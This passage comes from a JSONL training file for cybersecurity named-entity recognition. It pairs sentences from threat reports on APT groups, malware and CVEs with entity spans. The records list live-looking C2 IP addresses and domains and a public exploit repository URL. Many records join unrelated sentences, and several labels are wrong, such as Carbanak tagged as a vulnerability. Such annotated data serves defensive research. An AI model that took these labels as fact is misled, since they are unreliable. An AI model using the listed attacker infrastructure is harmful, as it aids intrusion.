These attacks are primarily targeting private industry in search of key intellectual property for competitive advantage , military institutions , and governmental organizations often in search of documents related to current political events and human rights organizations .", "spans": {"THREAT_ACTOR: Poseidon": [[10, 18]], "THREAT_ACTOR: threat actor": [[181, 193]], "ORGANIZATION: private industry": [[234, 250]], "ORGANIZATION: military institutions": [[318, 339]], "ORGANIZATION: governmental organizations": [[346, 372]], "ORGANIZATION: political": [[421, 430]], "ORGANIZATION: human rights organizations": [[442, 468]]}, "info": {"id": "cyberner_stix_train_007239", "source": "cyberner_stix_train"}} {"text": "The Stage-1 downloader will download and execute a new downloader , written in C++ , not so different from other Zebrocy downloaders .", "spans": {"TOOL: C++": [[79, 82]], "MALWARE: Zebrocy": [[113, 120]]}, "info": {"id": "cyberner_stix_train_007240", "source": "cyberner_stix_train"}} {"text": "Group-IB specialists detected various sites used by criminals to spread the Trojan : mail tracking websites , news portals , electronic books , computer graphics resources , music portals , etc . 
In addition to using SWCs to target specific types of organizations , TG-3390 uses spearphishing emails to target specific victims .", "spans": {"ORGANIZATION: Group-IB": [[0, 8]], "TOOL: mail tracking websites": [[85, 107]], "TOOL: news portals": [[110, 122]], "TOOL: electronic books": [[125, 141]], "TOOL: computer graphics resources": [[144, 171]], "TOOL: music portals": [[174, 187]], "MALWARE: SWCs": [[217, 221]], "THREAT_ACTOR: TG-3390": [[266, 273]], "TOOL: emails": [[293, 299]]}, "info": {"id": "cyberner_stix_train_007241", "source": "cyberner_stix_train"}} {"text": "This apparent disregard for publicity suggests , in our opinion , that the benefactors of the Dukes is so powerful and so tightly connected to the group that the Dukes are able to operate with no apparent fear of repercussions on getting caught .", "spans": {"THREAT_ACTOR: Dukes": [[94, 99], [162, 167]]}, "info": {"id": "cyberner_stix_train_007242", "source": "cyberner_stix_train"}} {"text": "In June 2017 , QiAnXin discovered new malware used by Molerats . We identified decoy files which indicate these attacks began with spear phishing messages but have not observed the actual messages .", "spans": {"ORGANIZATION: QiAnXin": [[15, 22]], "THREAT_ACTOR: Molerats": [[54, 62]], "FILEPATH: decoy files": [[79, 90]]}, "info": {"id": "cyberner_stix_train_007243", "source": "cyberner_stix_train"}} {"text": "In this situation , Word will present the same lure document to the victim as seen in Figure 2 , but without the ability to enable macros via an Enable Content button .", "spans": {"TOOL: Word": [[20, 24]], "TOOL: macros": [[131, 137]], "TOOL: Enable Content button": [[145, 166]]}, "info": {"id": "cyberner_stix_train_007244", "source": "cyberner_stix_train"}} {"text": "July 28 A recent campaign compromised Taiwan and Hong Kong sites to deliver Flash exploits related to Hacking Team . 
Other public tools used by the CopyKittens are Metasploit , a well-known free and open source framework for developing and executing exploit code against a remote target machine ; Mimikatz , a post-exploitation tool that performs credential dumping ; and Empire , a PowerShell and Python post-exploitation agent . In this case , FULLHOUSE.DOORED is a backdoor written in C / C++ that communicates using HTTP .", "spans": {"SYSTEM: Flash": [[76, 81]], "ORGANIZATION: Hacking Team": [[102, 114]], "THREAT_ACTOR: CopyKittens": [[148, 159]], "TOOL: Metasploit": [[164, 174]], "TOOL: Mimikatz": [[297, 305]], "TOOL: Empire": [[372, 378]], "TOOL: PowerShell": [[383, 393]], "MALWARE: FULLHOUSE.DOORED": [[446, 462]]}, "info": {"id": "cyberner_stix_train_007245", "source": "cyberner_stix_train"}} {"text": "] somtum [ . Trend Micro specifically noted that the 2013 versions of KeyBoy used the same algorithm for encoding their configuration files as was observed in the Operation Tropic Trooper malware . The previous versions of Aumlib had not changed since at least May 2011, and Ixeshe had not evolved since at least December 2011 . Malwarebytes customers are protected as we detect the infrastructure and final payload used in these attacks .", "spans": {"ORGANIZATION: Trend Micro": [[13, 24]], "TOOL: KeyBoy": [[70, 76]], "MALWARE: Aumlib": [[223, 229]], "ORGANIZATION: Malwarebytes": [[329, 341]]}, "info": {"id": "cyberner_stix_train_007246", "source": "cyberner_stix_train"}} {"text": "UNIQUE FEATURES BY VERSION EventBot Version 0.0.0.1 RC4 and Base64 Packet Encryption EventBot RC4 and Base64 data decryption from the C2 RC4 and Base64 data decryption from the C2 . This sample , similar to other Trochilus samples , was deployed using a DLL sideloading method utilizing three files , uploaded to the same folder on the victim machine as identified in US-CERT advisory TA17-117A last revised on December 20 , 2018 . 
These emails included recruitment-themed lures and links to malicious HTML Application files .", "spans": {"MALWARE: EventBot": [[27, 35], [85, 93]], "MALWARE: sample": [[187, 193]], "MALWARE: Trochilus": [[213, 222]], "TOOL: emails": [[438, 444]], "TOOL: HTML Application": [[502, 518]]}, "info": {"id": "cyberner_stix_train_007247", "source": "cyberner_stix_train"}} {"text": "The attachments exploited CVE-2017-8759 which was discovered and documented only five days prior to the campaign . Continued WhiteBear activity later shifted to include defense-related organizations into June 2017 .", "spans": {"VULNERABILITY: CVE-2017-8759": [[26, 39]], "ORGANIZATION: defense-related organizations": [[169, 198]]}, "info": {"id": "cyberner_stix_train_007248", "source": "cyberner_stix_train"}} {"text": "Infection Vector We have observed this recent wave of Zyklon malware being delivered primarily through spam emails . More recently , in May 2017 , APT33 appeared to target organizations in Saudi and South Korea using a malicious file that attempted to entice victims with job vacancies .", "spans": {"THREAT_ACTOR: Zyklon": [[54, 60]], "TOOL: spam emails": [[103, 114]], "THREAT_ACTOR: APT33": [[147, 152]], "FILEPATH: malicious file": [[219, 233]]}, "info": {"id": "cyberner_stix_train_007249", "source": "cyberner_stix_train"}} {"text": "Shamoon2 : 104.218.120.128 .", "spans": {"MALWARE: Shamoon2": [[0, 8]], "IP_ADDRESS: 104.218.120.128": [[11, 26]]}, "info": {"id": "cyberner_stix_train_007250", "source": "cyberner_stix_train"}} {"text": "This family showcases the amount of resources that malware authors now have to expend . Our research indicates that it has started targeting Japanese users . Then there is the dll install name , the domain , and the port . 
Talos discovered multiple vulnerabilities in Foxit PDF Reader that could allow an adversary to execute arbitrary code on the targeted machine .", "spans": {"ORGANIZATION: Japanese users": [[141, 155]], "TOOL: dll": [[176, 179]], "ORGANIZATION: Talos": [[223, 228]], "TOOL: Foxit PDF Reader": [[268, 284]]}, "info": {"id": "cyberner_stix_train_007251", "source": "cyberner_stix_train"}} {"text": "Attackers exploiting the vulnerability can corrupt memory and gain remote code execution .", "spans": {}, "info": {"id": "cyberner_stix_train_007252", "source": "cyberner_stix_train"}} {"text": "With the help of the open-source Android Dynamic Binary Instrumentation Toolkit and root privilege , it is possible to intercept any function execution . These attacks have included criminal groups responsible for the delivery of NewPosThings , MalumPOS and PoSeidon point of sale Malware , as well as Carbanak from the Russian criminal organization we track as Carbon Spider . . A Cl0p representative confirmed that they had been testing the vulnerability since July 2021 and that they had decided to deploy it over the Memorial Day weekend .", "spans": {"SYSTEM: Android": [[33, 40]], "THREAT_ACTOR: criminal groups": [[182, 197]], "THREAT_ACTOR: PoSeidon": [[258, 266]], "VULNERABILITY: Carbanak": [[302, 310]], "THREAT_ACTOR: criminal organization": [[328, 349]], "THREAT_ACTOR: Carbon Spider": [[362, 375]], "THREAT_ACTOR: Cl0p": [[382, 386]]}, "info": {"id": "cyberner_stix_train_007253", "source": "cyberner_stix_train"}} {"text": "The code makes use of the Windows Crypto API for 3DES and the decryption key is stored as a standard Windows PUBLICKEYSTRUC structure .", "spans": {"SYSTEM: Windows": [[26, 33], [101, 108]], "TOOL: Crypto": [[34, 40]], "TOOL: PUBLICKEYSTRUC": [[109, 123]]}, "info": {"id": "cyberner_stix_train_007254", "source": "cyberner_stix_train"}} {"text": "While we know that TEMP.Veles deployed the TRITON attack framework , we do not have specific evidence to prove that 
CNIIHM did ( or did not ) develop the tool .", "spans": {"THREAT_ACTOR: TEMP.Veles": [[19, 29]], "MALWARE: TRITON": [[43, 49]], "ORGANIZATION: CNIIHM": [[116, 122]]}, "info": {"id": "cyberner_stix_train_007255", "source": "cyberner_stix_train"}} {"text": "Per the domain ’s WHOIS record , an anonymized registrant registered com-ho.me in October 2016 and used it to serve malicious documents with similar macro activation features .", "spans": {"DOMAIN: com-ho.me": [[69, 78]]}, "info": {"id": "cyberner_stix_train_007256", "source": "cyberner_stix_train"}} {"text": "WannaCry leverages an exploit , codenamed \" EternalBlue \" , that was released by the Shadow Brokers on April 14 , 2017 . The Turla espionage group has been targeting various institutions for many years .", "spans": {"TOOL: WannaCry": [[0, 8]], "VULNERABILITY: EternalBlue": [[44, 55]], "THREAT_ACTOR: Shadow Brokers": [[85, 99]], "THREAT_ACTOR: Turla": [[125, 130]]}, "info": {"id": "cyberner_stix_train_007257", "source": "cyberner_stix_train"}} {"text": "The Conflict between Hamas and Fatah : The historical rivalry between the Hamas and Fatah has resulted in many open battles between the two entities .", "spans": {"ORGANIZATION: Hamas": [[21, 26], [74, 79]], "ORGANIZATION: Fatah": [[31, 36], [84, 89]]}, "info": {"id": "cyberner_stix_train_007258", "source": "cyberner_stix_train"}} {"text": "this RTF exploits again the CVE-2017_1882 on eqnedt32.exe . TG-3390 's activities indicate a preference for leveraging SWCs and scan-and-exploit techniques to compromise target systems .", "spans": {"MALWARE: RTF": [[5, 8]], "VULNERABILITY: CVE-2017_1882": [[28, 41]], "MALWARE: eqnedt32.exe": [[45, 57]]}, "info": {"id": "cyberner_stix_train_007259", "source": "cyberner_stix_train"}} {"text": "The threat actors appear to have leveraged publicly available exploit code that can be found on Github at the URL : https://github.com/rxwx/CVE-2017-8570 . 
For example , we have observed frequent reuse of older ( patched ) exploits in malware operations against the Tibetan community .", "spans": {"THREAT_ACTOR: threat actors": [[4, 17]], "ORGANIZATION: Tibetan community": [[266, 283]]}, "info": {"id": "cyberner_stix_train_007260", "source": "cyberner_stix_train"}} {"text": "T1444 Masquerade as Legitimate Application Impersonates legitimate GAS Tecnologia application . Symantec believes that the variant of Mimikatz used in this attack is unique to Waterbug . The McAfee Advanced Threat Research team discovered a previously unknown data-gathering implant that surfaced in mid-February 2018 .", "spans": {"SYSTEM: GAS Tecnologia": [[67, 81]], "ORGANIZATION: Symantec": [[96, 104]], "TOOL: Mimikatz": [[134, 142]], "THREAT_ACTOR: Waterbug": [[176, 184]], "ORGANIZATION: McAfee Advanced Threat Research": [[191, 222]], "FILEPATH: data-gathering implant": [[260, 282]]}, "info": {"id": "cyberner_stix_train_007261", "source": "cyberner_stix_train"}} {"text": "When the adversaries' operations are live , they modify the record again to point the C2 domain to an IP address they can access .", "spans": {"TOOL: C2": [[86, 88]]}, "info": {"id": "cyberner_stix_train_007262", "source": "cyberner_stix_train"}} {"text": "This engineer ’ s name is also associated with a company called eSurv S.R.L . Other public tools used by the CopyKittens are Metasploit , a well-known free and open source framework for developing and executing exploit code against a remote target machine ; Mimikatz , a post-exploitation tool that performs credential dumping ; and Empire , a PowerShell and Python post-exploitation agent . 
The threat group in this recently observed campaign – TEMP.Zagros – weaponized their malware using the following techniques .", "spans": {"ORGANIZATION: eSurv S.R.L .": [[64, 77]], "THREAT_ACTOR: CopyKittens": [[109, 120]], "TOOL: Metasploit": [[125, 135]], "TOOL: Mimikatz": [[258, 266]], "TOOL: Empire": [[333, 339]], "TOOL: PowerShell": [[344, 354]]}, "info": {"id": "cyberner_stix_train_007263", "source": "cyberner_stix_train"}} {"text": "System applications with root , by contrast , have super-user permissions that allow them to break out of such sandboxes . CTU researchers also identified components in the custom C2 protocol being used which they have seen utilized by Nickel Academy ( Lazarus ) previously . APT33 : 89.34.237.118 mywinnetwork.ddns.net . Among the IP addresses owned by Hack520 is a whole/22 IP Range which we dubbed as the “ PIG RANGE ” .", "spans": {"ORGANIZATION: CTU": [[123, 126]], "TOOL: custom C2 protocol": [[173, 191]], "THREAT_ACTOR: Nickel Academy": [[236, 250]], "THREAT_ACTOR: Lazarus": [[253, 260]], "THREAT_ACTOR: APT33": [[276, 281]], "IP_ADDRESS: 89.34.237.118": [[284, 297]], "DOMAIN: mywinnetwork.ddns.net": [[298, 319]], "THREAT_ACTOR: Hack520": [[354, 361]]}, "info": {"id": "cyberner_stix_train_007264", "source": "cyberner_stix_train"}} {"text": "It was primarily notable for its high-volume campaigns and its association with TA505 , given the actor ’s propensity for massive campaigns and ability to dominate the email landscape .", "spans": {"THREAT_ACTOR: TA505": [[80, 85]], "TOOL: email": [[168, 173]]}, "info": {"id": "cyberner_stix_train_007265", "source": "cyberner_stix_train"}} {"text": "We believe the actors pivoted to other systems on the network using stolen credentials and by exploiting the CVE-2017-0144 (EternalBlue) vulnerability patched in MS17-010 . 
If the document was delivered with macros instead of exploits ( CVE-2012-0158 , CVE-2013-3906 or CVE-2014-1761 ) , then the document contained instructions for enabling macros .", "spans": {"THREAT_ACTOR: actors": [[15, 21]], "VULNERABILITY: CVE-2017-0144": [[109, 122]], "MALWARE: MS17-010": [[162, 170]], "VULNERABILITY: CVE-2012-0158": [[237, 250]], "VULNERABILITY: CVE-2013-3906": [[253, 266]], "VULNERABILITY: CVE-2014-1761": [[270, 283]]}, "info": {"id": "cyberner_stix_train_007266", "source": "cyberner_stix_train"}} {"text": "This newest entry seems to indicate that these changes won ’ t be stopping soon . Georgian military security issues , particularly with regard to U.S. cooperation and NATO , provide a strong incentive for Russian state-sponsored threat actors to steal information that sheds light on these topics . After writing the data received from the controller, a function is called to process the received . The UK , on the other hand , emerged as the second - largest ransomware target , enduring close to 200 ransomware attacks .", "spans": {"THREAT_ACTOR: threat actors": [[229, 242]]}, "info": {"id": "cyberner_stix_train_007267", "source": "cyberner_stix_train"}} {"text": "PLATINUM often spear phishes its targets at their non-official or private email accounts , to use as a stepping stone into the intended organization 's network . 
one organization is located in the US .", "spans": {"THREAT_ACTOR: PLATINUM": [[0, 8]]}, "info": {"id": "cyberner_stix_train_007268", "source": "cyberner_stix_train"}} {"text": "These changes include : Removing the SYSTEM_ALERT_WINDOW error and alert window types , and introducing a few other types as replacement Elevating the permission status of SYSTEM_ALERT_WINDOW to special permission by putting it into the “ above dangerous ” category , which means that users have to go through many screens to approve apps that ask for permission , instead of just one click Introducing an overlay kill switch on Android 8.0 and later that users can activate anytime to deactivate a system alert window To adapt , Android malware evolved to misusing The Korean-language Word document manual.doc appeared in Vietnam on January 17 , with the original author name of Honeybee . The focus should be on isolating the affected devices and/or networks to prevent further spread and minimize the impact .", "spans": {"SYSTEM: Android 8.0": [[429, 440]], "SYSTEM: Android": [[530, 537]], "TOOL: Word document": [[586, 599]], "MALWARE: manual.doc": [[600, 610]], "THREAT_ACTOR: Honeybee": [[680, 688]]}, "info": {"id": "cyberner_stix_train_007269", "source": "cyberner_stix_train"}} {"text": "TA505 continued distributing Dridex through early June 2017 using a range of email attachments .", "spans": {"THREAT_ACTOR: TA505": [[0, 5]], "MALWARE: Dridex": [[29, 35]], "TOOL: email": [[77, 82]]}, "info": {"id": "cyberner_stix_train_007270", "source": "cyberner_stix_train"}} {"text": "Some hackers even went onto use the Cisco exploits in the wild . 
LuckyMouse has been spotted using a widely used Microsoft Office vulnerability ( CVE-2017-11882 ) .", "spans": {"VULNERABILITY: Cisco exploits": [[36, 50]], "TOOL: Microsoft Office": [[113, 129]], "VULNERABILITY: CVE-2017-11882": [[146, 160]]}, "info": {"id": "cyberner_stix_train_007271", "source": "cyberner_stix_train"}} {"text": "Note that the 104.168.167.16 server is used as a C2 server .", "spans": {"IP_ADDRESS: 104.168.167.16": [[14, 28]], "TOOL: C2": [[49, 51]]}, "info": {"id": "cyberner_stix_train_007272", "source": "cyberner_stix_train"}} {"text": "tcpdo [ . During multiple engagements , APT41 attempted to remove evidence of some of its activity by deleting Bash histories , clearing Windows security and system events , and modifying DNS management to avoid anti-virus detections . APT29 has used The Onion Router and the TOR domain fronting plugin meek to create a hidden , encrypted network tunnel that appeared to connect to Google services over TLS .", "spans": {"THREAT_ACTOR: APT41": [[40, 45]], "THREAT_ACTOR: APT29": [[236, 241]], "MALWARE: The Onion Router": [[251, 267]], "MALWARE: TOR domain fronting plugin meek": [[276, 307]], "ORGANIZATION: Google": [[382, 388]]}, "info": {"id": "cyberner_stix_train_007273", "source": "cyberner_stix_train"}} {"text": "SpyNote RAT was designed to function only over Wi-Fi , which is the preferable mode for Android malware to send files to C & C . On October 18th , 2018 , the group sent out emails to British financial companies as part of their preparatory campaign . 
Since 2013 , the Cobalt have attempted to attack banks and financial institutions using pieces of malware they designed .", "spans": {"MALWARE: SpyNote RAT": [[0, 11]], "SYSTEM: Android": [[88, 95]], "THREAT_ACTOR: group": [[158, 163]], "ORGANIZATION: financial": [[191, 200]], "THREAT_ACTOR: Cobalt": [[268, 274]], "ORGANIZATION: banks": [[300, 305]], "ORGANIZATION: financial institutions": [[310, 332]]}, "info": {"id": "cyberner_stix_train_007274", "source": "cyberner_stix_train"}} {"text": "In total , there are 32 different routines , each of them implementing a different opcode and some basic functionality that the malware program may execute . The oldest sample we found was created in 2009 , indicating this tool has been in use for almost seven years . There is no way around this : the attackers are simply not interested in computers configured with those languages . The malware uses stack strings followed by a single bitwise operation .", "spans": {"MALWARE: The malware": [[386, 397]]}, "info": {"id": "cyberner_stix_train_007275", "source": "cyberner_stix_train"}} {"text": "ORat and Cobalt Strike C2 server : strust.club .", "spans": {"MALWARE: ORat": [[0, 4]], "TOOL: Cobalt Strike": [[9, 22]], "TOOL: C2": [[23, 25]], "DOMAIN: strust.club": [[35, 46]]}, "info": {"id": "cyberner_stix_train_007276", "source": "cyberner_stix_train"}} {"text": "DanderSpritz consists entirely of plugins to gather intelligence , use exploits and examine already controlled machines . 
The Infy malware was seen targeting Iranians again in June 2015 , when it was shared with researchers after being sent to a broadcast journalist at BBC Persian with a generic introduction and a PowerPoint presentation attached titled \" Nostalogy \" ( sic ) .", "spans": {"TOOL: DanderSpritz": [[0, 12]], "MALWARE: Infy": [[126, 130]], "MALWARE: malware": [[131, 138]], "ORGANIZATION: Iranians": [[158, 166]], "ORGANIZATION: broadcast journalist": [[246, 266]], "ORGANIZATION: BBC Persian": [[270, 281]], "TOOL: PowerPoint": [[316, 326]]}, "info": {"id": "cyberner_stix_train_007277", "source": "cyberner_stix_train"}} {"text": "Backdoor.APT.PittyTiger – This malware is the classic \" PittyTiger \" malware ( PittyTigerV1.0 ) that was heavily used by this group in 2012 - 2013 . To control the full operation , MoneyTaker uses a Pentest framework Server .", "spans": {"TOOL: Backdoor.APT.PittyTiger": [[0, 23]], "THREAT_ACTOR: PittyTiger": [[56, 66]], "TOOL: PittyTigerV1.0": [[79, 93]], "THREAT_ACTOR: group": [[126, 131]], "THREAT_ACTOR: MoneyTaker": [[181, 191]], "MALWARE: Pentest framework Server": [[199, 223]]}, "info": {"id": "cyberner_stix_train_007278", "source": "cyberner_stix_train"}} {"text": "CVE-2014-0515 exploits a vulnerability in Flash ’s Shader processing , whereas CVE-2015-3043 exploits a vulnerability in Flash ’s FLV processing .", "spans": {"VULNERABILITY: CVE-2014-0515": [[0, 13]], "TOOL: Flash": [[42, 47], [121, 126]], "VULNERABILITY: CVE-2015-3043": [[79, 92]], "TOOL: FLV": [[130, 133]]}, "info": {"id": "cyberner_stix_train_007279", "source": "cyberner_stix_train"}} {"text": "First , Volatility 's pstree plugin , which lists running processes in a tree view , was executed .", "spans": {"TOOL: Volatility": [[8, 18]], "TOOL: pstree": [[22, 28]], "TOOL: plugin": [[29, 35]]}, "info": {"id": "cyberner_stix_train_007280", "source": "cyberner_stix_train"}} {"text": "It does this by using infected devices to imitate clicks on the install , buy , and accept buttons 
. In November 2017 , SecureWorks Counter Threat Unit ( CTU ) researchers investigated a widespread and opportunistic WCry ransomware campaign that impacted many systems around the world . APT33 : 162.250.145.204 mynetwork.ddns.net . The Monti ransomware collective has restarted their operations , focusing on institutions in the legal and governmental fields .", "spans": {"ORGANIZATION: SecureWorks Counter Threat Unit": [[120, 151]], "ORGANIZATION: CTU": [[154, 157]], "THREAT_ACTOR: APT33": [[287, 292]], "IP_ADDRESS: 162.250.145.204": [[295, 310]], "DOMAIN: mynetwork.ddns.net": [[311, 329]], "ORGANIZATION: institutions in the legal and governmental fields .": [[409, 460]]}, "info": {"id": "cyberner_stix_train_007281", "source": "cyberner_stix_train"}} {"text": "In this case , the first sample I looked at stood out for another reason entirely .", "spans": {}, "info": {"id": "cyberner_stix_train_007282", "source": "cyberner_stix_train"}} {"text": "The relevant handler of the client is called , collects the system information and sends it back inside IPacket of GetSystemInfoResponse .", "spans": {}, "info": {"id": "cyberner_stix_train_007283", "source": "cyberner_stix_train"}} {"text": "The QiAnXin keeps a close eye on activities made by OceanLotus . McAfee concludes that some groups—and especially the Poetry Group —have shifted tactics to use Citadel in ACTs other than what it was originally intended for . McAfee Advanced Threat research determines with confidence that Lazarus is the threat group behind this attack for the following reasons:Contacts an IP address / domain that was used to host a malicious document from a Lazarus previous campaign in 2017 . In November 2017 , Talos observed the Group123 , which included a new version of ROKRAT being used in the latest wave of attacks . In addition to TALOS investigation on KONNI , on July 18 2017 , BitDefender released a whitepaper on DarkHotel . 
According to security 360 Threat Intelligence Center , Goldmouse was observed deploying the nebulous njRAT backdoor . ESET has also reported PowerShell scripts being used by Turla to provide direct , in-memory loading and execution of malware . Additionally Kaspersky identified a new backdoor that we attribute with medium confidence to Turla . Researchers at Symantec suspect that Turla used the hijacked network to attack a Middle Eastern government . Symantec researchers have uncovered evidence that the Waterbug APT group has conducted a hostile takeover of an attack platform . Researchers at the Microstep Intelligence Bureau have published a report on targeted attacks on the Ukrainian government that they attribute to the Gamaredon threat actor . Kaspersky found an active campaign by a Chinese APT group we call SixLittleMonkeys that uses a new version of the Microcin Trojan and a RAT that we call HawkEye as a last stager . Trend Micro has previously reported the use of this malware in targeted attacks by the BlackTech group , primarily focused on cyber-espionage in Asia . LuckyMouse activity detected by Palo Alto involved the attackers installing web shells on SharePoint servers to compromise government organizations in the Middle East . Talos published its analysis of the BlackWater campaign , related to MuddyWater group . Trend Micro also reported MuddyWater’s use of a new multi-stage PowerShell-based backdoor called POWERSTATS v3 . Regarding other groups , Kaspersky discovered new activity related to ZooPark , a cyber-espionage threat actor that has focused mainly on stealing data from Android devices . 
Recorded Future published an analysis of the infrastructure built by APT33 ( aka Elfin ) to target Saudi organizations .", "spans": {"ORGANIZATION: QiAnXin": [[4, 11]], "THREAT_ACTOR: OceanLotus": [[52, 62]], "ORGANIZATION: McAfee": [[65, 71], [225, 231]], "THREAT_ACTOR: Group": [[125, 130]], "THREAT_ACTOR: Lazarus": [[289, 296], [444, 451]], "FILEPATH: malicious document": [[418, 436]], "ORGANIZATION: Talos": [[499, 504], [1983, 1988]], "THREAT_ACTOR: Group123": [[518, 526]], "ORGANIZATION: TALOS": [[626, 631]], "MALWARE: KONNI": [[649, 654]], "THREAT_ACTOR: DarkHotel": [[712, 721]], "ORGANIZATION: 360 Threat Intelligence Center": [[746, 776]], "FILEPATH: njRAT backdoor": [[825, 839]], "ORGANIZATION: ESET": [[842, 846]], "MALWARE: PowerShell scripts": [[865, 883]], "THREAT_ACTOR: Turla": [[898, 903], [1062, 1067], [1107, 1112]], "ORGANIZATION: Kaspersky": [[982, 991], [1482, 1491], [2209, 2218]], "FILEPATH: backdoor": [[1009, 1017]], "ORGANIZATION: Symantec": [[1085, 1093], [1179, 1187]], "ORGANIZATION: government": [[1166, 1176]], "THREAT_ACTOR: Waterbug": [[1233, 1241]], "ORGANIZATION: Microstep Intelligence Bureau": [[1328, 1357]], "ORGANIZATION: Ukrainian government": [[1409, 1429]], "THREAT_ACTOR: Gamaredon": [[1457, 1466]], "THREAT_ACTOR: SixLittleMonkeys": [[1548, 1564]], "MALWARE: Microcin Trojan": [[1596, 1611]], "MALWARE: RAT": [[1618, 1621]], "ORGANIZATION: Trend Micro": [[1662, 1673], [2071, 2082]], "THREAT_ACTOR: BlackTech": [[1749, 1758]], "THREAT_ACTOR: LuckyMouse": [[1814, 1824]], "ORGANIZATION: Palo Alto": [[1846, 1855]], "MALWARE: web shells": [[1890, 1900]], "ORGANIZATION: government organizations": [[1937, 1961]], "THREAT_ACTOR: MuddyWater": [[2052, 2062]], "THREAT_ACTOR: MuddyWater’s": [[2097, 2109]], "FILEPATH: POWERSTATS v3": [[2168, 2181]], "THREAT_ACTOR: groups": [[2200, 2206]], "THREAT_ACTOR: ZooPark": [[2254, 2261]], "SYSTEM: Android": [[2341, 2348]], "ORGANIZATION: Recorded Future": [[2359, 2374]], "THREAT_ACTOR: APT33": [[2428, 2433]], 
"THREAT_ACTOR: Elfin": [[2440, 2445]]}, "info": {"id": "cyberner_stix_train_007284", "source": "cyberner_stix_train"}} {"text": "a keylogger that works in every app installed on the Android device . Butterfly has also shown an interest in the commodities sector , attacking two major companies involved in gold and oil in late 2014 . So far , the groups have not used any zero-days . We first heard of this new campaign thanks to a Mastodon post by Randy McEoin .", "spans": {"SYSTEM: Android": [[53, 60]], "THREAT_ACTOR: Butterfly": [[70, 79]], "ORGANIZATION: commodities sector": [[114, 132]], "ORGANIZATION: gold": [[177, 181]], "ORGANIZATION: oil": [[186, 189]], "VULNERABILITY: zero-days": [[243, 252]], "ORGANIZATION: Mastodon": [[303, 311]], "ORGANIZATION: Randy McEoin": [[320, 332]]}, "info": {"id": "cyberner_stix_train_007285", "source": "cyberner_stix_train"}} {"text": "In the injected payload , the module implements the method ‘ callActivityOnCreate ’ . This week we are going to discuss Clever Kitten , whom , by virtue of several indicators , we have affiliated with the Islamic Republic of Iran . It removes setup.exe ’s contents and replaces them with the third decrypted executable , a cryptocurrency miner . Malwarebytes EDR and MDR removes all remnants of ransomware and prevents you from getting reinfected .", "spans": {"FILEPATH: setup.exe": [[243, 252]], "ORGANIZATION: Malwarebytes EDR and MDR": [[346, 370]]}, "info": {"id": "cyberner_stix_train_007286", "source": "cyberner_stix_train"}} {"text": "This way , the malware can have its configuration , malicious binaries and file listings updated , but can also download and execute other binaries . 
This bait document , or email attachment , appears to be a standard Word document , but is in fact an CVE-2012-0158 exploit , an executable with a double extension , or an executable with an RTLO filename , so it can execute code without the user 's knowledge or consent .", "spans": {"MALWARE: malware": [[15, 22]], "FILEPATH: bait document": [[155, 168]], "TOOL: Word": [[218, 222]], "VULNERABILITY: CVE-2012-0158": [[252, 265]], "VULNERABILITY: exploit": [[266, 273]]}, "info": {"id": "cyberner_stix_train_007287", "source": "cyberner_stix_train"}} {"text": "The threat is likely targeting employees of various Palestinian government agencies , security services , Palestinian students , and those affiliated with the Fatah political party . With GozNym , attackers dupe users by showing them the actual bank 's URL and SSL certificate . Older versions of WEBC2 read data between HTML comments , though over time WEBC2 variants have evolved to read data contained within other types of tags . \" Having infected gaming companies that do business in MMORPG , the attackers potentially get access to millions of users , \" the researchers wrote .", "spans": {"ORGANIZATION: Fatah": [[159, 164]], "TOOL: GozNym": [[188, 194]], "ORGANIZATION: bank": [[245, 249]], "TOOL: URL": [[253, 256]], "TOOL: SSL certificate": [[261, 276]], "MALWARE: WEBC2": [[297, 302], [354, 359]], "TOOL: HTML": [[321, 325]], "ORGANIZATION: gaming companies": [[452, 468]], "THREAT_ACTOR: attackers": [[502, 511]]}, "info": {"id": "cyberner_stix_train_007288", "source": "cyberner_stix_train"}} {"text": "In one remarkable case , the Carbanak 2.0 gang used its access to a financial institution that stores information about shareholders to change the ownership details of a large company . 
Even an experienced user can be fooled by downloading a malicious file that is apparently from adobe.com , since the URL and the IP address correspond to Adobe 's legitimate infrastructure .", "spans": {"VULNERABILITY: Carbanak": [[29, 37]], "ORGANIZATION: financial institution": [[68, 89]], "FILEPATH: malicious file": [[242, 256]]}, "info": {"id": "cyberner_stix_train_007289", "source": "cyberner_stix_train"}} {"text": "CONTACTS_PRO – request unique message text for contacts from the address book . The attackers then began to perform reconnaissance activities on Computer A via cmd.exe , collecting system-related information , such as the OS version , hardware configuration , and network information . Researching the hacker handle MagicCoder results in references to the Iranian hacking forum Ashiyane as well as defacements by the Iranian hacker group Sun Army .", "spans": {"MALWARE: cmd.exe": [[160, 167]], "THREAT_ACTOR: hacker": [[302, 308]], "THREAT_ACTOR: Ashiyane": [[378, 386]], "THREAT_ACTOR: Sun Army": [[438, 446]]}, "info": {"id": "cyberner_stix_train_007290", "source": "cyberner_stix_train"}} {"text": "What we found were several other fake apps developed using the SpyNote builder , which should come as a warning to Android users . On 16 January 2019 , Silence sent out phishing emails with malicious attachments disguised as invitations to the International Financial Forum iFin-2019 (see section ‘Attack timeline’) . 
The hacking group misused Cobalt Strike , for instance , to perpetrate ATM cyber heists and target financial institutions across Europe , and interestingly , Russia .", "spans": {"MALWARE: SpyNote": [[63, 70]], "SYSTEM: Android": [[115, 122]], "THREAT_ACTOR: Silence": [[152, 159]], "ORGANIZATION: Financial": [[258, 267]], "MALWARE: Cobalt Strike": [[344, 357]], "THREAT_ACTOR: cyber heists": [[393, 405]], "ORGANIZATION: financial institutions": [[417, 439]]}, "info": {"id": "cyberner_stix_train_007291", "source": "cyberner_stix_train"}} {"text": "android.intent.action.PACKAGE_INSTALL System notification that the download and eventual installation of an app package is happening ( this is deprecated ) android.intent.action.PACKAGE_ADDED System notification that a new app package has been installed on the device , including the name of said package . In 2018 , the group inserted CRACKSHOT malware into game files that were signed with legitimate codesigning certificates , most likely indicating access to the production environment , which facilitated a supply chain compromise . The APT28 , which is linked to the Russian government , returned to low-key intelligence-gathering operations during 2017 and into 2018 , targeting a range of military and government targets in Europe and South America .", "spans": {"THREAT_ACTOR: group": [[321, 326]], "THREAT_ACTOR: APT28": [[542, 547]], "ORGANIZATION: Russian government": [[573, 591]], "ORGANIZATION: military": [[697, 705]], "ORGANIZATION: government": [[710, 720]]}, "info": {"id": "cyberner_stix_train_007292", "source": "cyberner_stix_train"}} {"text": "Victims who used the torrent files to download the applications would end up getting infected with OnionDuke .", "spans": {"MALWARE: OnionDuke": [[99, 108]]}, "info": {"id": "cyberner_stix_train_007293", "source": "cyberner_stix_train"}} {"text": "It also disables Play Protect ( Google ’ s preinstalled antivirus solution ) to prevent its discovery and deletion in the future . 
